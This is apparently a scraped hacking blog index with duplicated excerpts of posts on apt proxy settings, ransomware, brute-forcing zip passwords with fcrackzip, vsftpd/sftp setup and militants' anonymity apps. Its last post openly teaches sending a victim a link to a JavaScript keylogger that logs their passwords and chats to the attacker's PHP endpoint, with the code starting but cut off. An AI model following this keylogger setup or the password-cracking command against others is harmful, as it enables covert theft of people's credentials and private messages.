https://www.proxysite.com
This web proxy is better for watch youtube videos smoothly if your administrator has blocked youtube and other social media sites.
Monday, June 5, 2017
Thursday, June 1, 2017
How apt get get in to work behind a proxy server
apt-get is the command in debian based linux systems for package installation, update, upgrade and number of software package related function. But if you are behind a proxy server it will be tough issue to get update your linux system (or install relavant packages). For this you have to edit a config file in /etc/apt/apt.conf
sudo nano /etc/apt/apt.conf
and add these to this file.
Acquire::socks::proxy "socks://<username>:<password>@<proxy>:<port>/";
Acquire::http::proxy "http://<username>:<password>@<proxy>:<port>/";
Acquire::ftp::proxy "ftp://<username>:<password>@<proxy>:<port>/";
Acquire::https::proxy "https://<username>:<password>@<proxy>:<port>/";
Save the file and run apt-get again
sudo nano /etc/apt/apt.conf
and add these to this file.
Acquire::socks::proxy "socks://<username>:<password>@<proxy>:<port>/";
Acquire::http::proxy "http://<username>:<password>@<proxy>:<port>/";
Acquire::ftp::proxy "ftp://<username>:<password>@<proxy>:<port>/";
Acquire::https::proxy "https://<username>:<password>@<proxy>:<port>/";
Save the file and run apt-get again
Friday, April 7, 2017
Infected with RANSOMEWARE ?
Ransomwares are bad headache for these days in all industries such as hospitals, hotels, schools and any of organization because of its destructive nature. It is a very big threat for government organizations also. Most ransomware attackers are targeting organizations, companies or places which runs critical operation that cannot be have a delay with their service because then they can achieve their goal (make their ransom) easier.
Wednesday, October 19, 2016
Crack ZIP file's password using KALI
Using fcrackzip tool we can crack zip files password in kali.
Use the following command to crack zip file
fcrackzip -b -c 'aA1!' -l 1-10 -u file_name.zip
fcrackzip is the tool
b - use Brute forcing
c - character set (a - lower case, A-upper case, 1 - Numbers, ! - symbols.)
l - length of the password for bruteforce
Use the following command to crack zip file
fcrackzip -b -c 'aA1!' -l 1-10 -u file_name.zip
fcrackzip is the tool
b - use Brute forcing
c - character set (a - lower case, A-upper case, 1 - Numbers, ! - symbols.)
l - length of the password for bruteforce
Thursday, August 25, 2016
Install and configure sftp server on Ubuntu Server
Install VSFTPD
sudo apt-get install vsftpd
Configuring VSFTPD.
open /etc/vftpd.conf file
Uncomment the following lines ;
write_enable=YES
local_umask=022
chroot_local_user=YES
Add the following line at the end of the file.
allow_writeable_chroot=YES
Now restart vsftpd.
Create a user for ftp and prevent use bash shell
sudo useradd -m john -s /usr/sbin/nologin
sudo passwd john
Now open /etc/shells file and add the following to the end of the file.
/usr/sbin/nologin
Install Open-SSH
sudo apt-get install openssh-server
Configure ssh to use in ftp.
For secure reason we should add a specific group for sshftp sessions. And add authorized users to that account.
sudo groupadd ftpgroup
sudo groupadd ftpuser
Configure ssh config file.
Open /etc/ssh/sshd_config file,
Find the Subsystem sftp .... line and edit it as follows
Subsystem sftp internal-sftp
And add the following to the end
Match group ftpgroup
For comprehensive understanding about sshd_config file type the following in terminal.
man sshd_conifg
sudo apt-get install vsftpd
Configuring VSFTPD.
open /etc/vftpd.conf file
Uncomment the following lines ;
write_enable=YES
local_umask=022
chroot_local_user=YES
Add the following line at the end of the file.
allow_writeable_chroot=YES
Now restart vsftpd.
Create a user for ftp and prevent use bash shell
sudo useradd -m john -s /usr/sbin/nologin
sudo passwd john
Now open /etc/shells file and add the following to the end of the file.
/usr/sbin/nologin
You can now connect using ftp to the server. But this is not protected. Any one can intercept with your traffic. You should use SSH FTP to secure the connection.Install Open-SSH
sudo apt-get install openssh-server
Configure ssh to use in ftp.
For secure reason we should add a specific group for sshftp sessions. And add authorized users to that account.
sudo groupadd ftpgroup
sudo groupadd ftpuser
Configure ssh config file.
Open /etc/ssh/sshd_config file,
Find the Subsystem sftp .... line and edit it as follows
Subsystem sftp internal-sftp
And add the following to the end
Match group ftpgroup
For comprehensive understanding about sshd_config file type the following in terminal.
man sshd_conifg
Thursday, July 28, 2016
Must have apps for Hackers' mobile phones
Recently there is a post on flashpoint-intel.com about the Jihad's technologies used for their anonymity and other purposes in Mobiles. Here I will classify that article more details can be find at the above link.
When we go through that article we can see Jihads has very focused on mobile security with android. We will go by each category that they have used.
Secure Browsers.
Our mostly faithful browser is TOR. Jihads also using TOR browser for their internet surf but they are using additional layer of security also instead of the layer built-in TOR. Because now NSA has intervene with TOR.
Instead of TOR they are using Opera Browser also. The reason for this selection is because the new Opera provide free VPN service along with the browser. So they can mask their IP while browsing.
When we go through that article we can see Jihads has very focused on mobile security with android. We will go by each category that they have used.
Secure Browsers.
Our mostly faithful browser is TOR. Jihads also using TOR browser for their internet surf but they are using additional layer of security also instead of the layer built-in TOR. Because now NSA has intervene with TOR.
Instead of TOR they are using Opera Browser also. The reason for this selection is because the new Opera provide free VPN service along with the browser. So they can mask their IP while browsing.
Friday, April 29, 2016
Hack only sending a link(Java script key logger)
Key loggers are very funny and my favourite way of hacking. So in this article we are going to take look at how send a link to someone who you needed to attack, take his/ her key logs / Passwords / what's he/she chatting by just sending a ling to the victim.
For this we are using java scripts which is run on client side and php which is going to run on server side. So this is the setup,
Firstly we are creating two pages. One is html page which we are going to include our java script and the other is php page which is going to save all the key logs return from the remote victim. After we created those two pages we are sending the link to our html page to the victim. When the victims go to that link and when he is typing all key logs going to be saved on our server.
So here is the java script which you need to include in html page.
----------------------------------------------------------------------------------------------------------
<html>
<script lang=javascript type=text/javascript>
var buffer = [];
var attacker = '/k.php?c='
For this we are using java scripts which is run on client side and php which is going to run on server side. So this is the setup,
Firstly we are creating two pages. One is html page which we are going to include our java script and the other is php page which is going to save all the key logs return from the remote victim. After we created those two pages we are sending the link to our html page to the victim. When the victims go to that link and when he is typing all key logs going to be saved on our server.
So here is the java script which you need to include in html page.
----------------------------------------------------------------------------------------------------------
<html>
<script lang=javascript type=text/javascript>
var buffer = [];
var attacker = '/k.php?c='
Subscribe to:
Posts (Atom)